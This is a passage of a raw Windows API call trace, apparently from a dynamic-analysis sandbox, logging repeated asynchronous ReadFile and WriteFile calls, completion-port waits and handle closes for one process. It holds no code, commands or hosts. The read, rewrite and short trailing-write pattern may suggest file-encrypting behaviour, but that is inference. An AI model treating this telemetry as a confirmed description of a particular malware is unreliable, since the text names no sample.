lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.395] WriteFile (in: hFile=0x674, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0xe5e5, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x41f0020) returned 1 [0151.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.395] ReadFile (in: hFile=0x674, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0151.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0151.395] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0151.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.395] WriteFile (in: hFile=0x674, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x41f0020) returned 1 [0151.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0151.395] CloseHandle (hObject=0x674) returned 1 [0151.396] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0151.397] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0155.491] ReadFile (in: hFile=0x134, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x2910020) returned 1 [0155.491] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0155.491] ReadFile (in: hFile=0x65c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x41f0020) returned 1 [0155.492] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0155.492] ReadFile (in: hFile=0x1a8, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4670020) returned 1 [0155.493] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0155.493] WriteFile (in: hFile=0x134, lpBuffer=0x2910124*, nNumberOfBytesToWrite=0x7917, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2910020) returned 1 [0155.512] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0155.512] ReadFile (in: hFile=0x134, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x2910020) returned 0x0 [0155.512] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0155.512] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0155.512] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0155.512] WriteFile (in: hFile=0x134, lpBuffer=0x2910094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2910020 | out: lpBuffer=0x2910094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2910020) returned 1 [0155.515] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0155.515] ReadFile (in: hFile=0x1a8, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4670020) returned 0x0 [0155.515] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0155.515] CloseHandle (hObject=0x134) returned 1 [0155.522] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2910020) returned 1 [0155.522] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.002] WriteFile (in: hFile=0x61c, lpBuffer=0x4790124*, nNumberOfBytesToWrite=0x7ea1, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4790020) returned 1 [0156.027] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.028] WriteFile (in: hFile=0x66c, lpBuffer=0x4af0124*, nNumberOfBytesToWrite=0xed9b, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4af0020) returned 1 [0156.032] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.032] ReadFile (in: hFile=0x65c, lpBuffer=0x2910124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x2910020 | out: lpBuffer=0x2910124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x2910020) returned 0x0 [0156.032] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.032] ReadFile (in: hFile=0x674, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0156.032] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.032] ReadFile (in: hFile=0x658, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4670020) returned 0x0 [0156.032] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.032] ReadFile (in: hFile=0x1c, lpBuffer=0x4e50124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4e50020) returned 1 [0156.032] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.033] ReadFile (in: hFile=0x61c, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4790020) returned 0x0 [0156.033] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.033] ReadFile (in: hFile=0x640, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x48b0020) returned 0x0 [0156.033] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.033] ReadFile (in: hFile=0x648, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x49d0020) returned 0x0 [0156.033] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.033] ReadFile (in: hFile=0x66c, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4af0020) returned 0x0 [0156.033] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0156.033] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0156.033] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0156.033] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0156.033] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0156.033] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0156.034] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.034] WriteFile (in: hFile=0x1c, lpBuffer=0x4e50124*, nNumberOfBytesToWrite=0xe51f, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4e50020) returned 1 [0156.040] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.042] WriteFile (in: hFile=0x640, lpBuffer=0x48b0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x48b0020) returned 1 [0156.045] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.045] ReadFile (in: hFile=0x638, lpBuffer=0x4c10124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4c10020) returned 0x0 [0156.045] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.045] ReadFile (in: hFile=0x620, lpBuffer=0x4d30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4d30020) returned 0x0 [0156.045] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.046] ReadFile (in: hFile=0x1c, lpBuffer=0x4e50124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4e50020) returned 0x0 [0156.046] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.046] CloseHandle (hObject=0x65c) returned 1 [0156.074] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2910020) returned 1 [0156.075] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0156.078] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4c10020) returned 1 [0156.078] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0156.078] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4d30020) returned 1 [0156.078] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0156.079] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4e50020) returned 1 [0156.079] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.079] CloseHandle (hObject=0x648) returned 1 [0156.089] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x49d0020) returned 1 [0156.089] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.089] WriteFile (in: hFile=0x620, lpBuffer=0x4d30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4d30020) returned 1 [0156.095] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0156.111] CloseHandle (hObject=0x1c) returned 1 [0156.119] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e50020) returned 1 [0156.119] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 Thread: id = 125 os_tid = 0x8dc [0136.131] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.716] ReadFile (in: hFile=0x648, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4af0020) returned 1 [0147.717] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.718] ReadFile (in: hFile=0x644, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4700020) returned 0x0 [0147.718] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0147.718] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0147.719] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0147.719] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0147.719] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.719] WriteFile (in: hFile=0x634, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x2f30020) returned 1 [0147.728] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.728] WriteFile (in: hFile=0x648, lpBuffer=0x4af0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4af0020) returned 1 [0147.741] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.745] CloseHandle (hObject=0x640) returned 1 [0147.762] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x49d0020) returned 1 [0147.762] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.973] ReadFile (in: hFile=0x620, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x41f0020) returned 1 [0147.974] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.974] ReadFile (in: hFile=0x660, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4670020) returned 1 [0147.975] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, 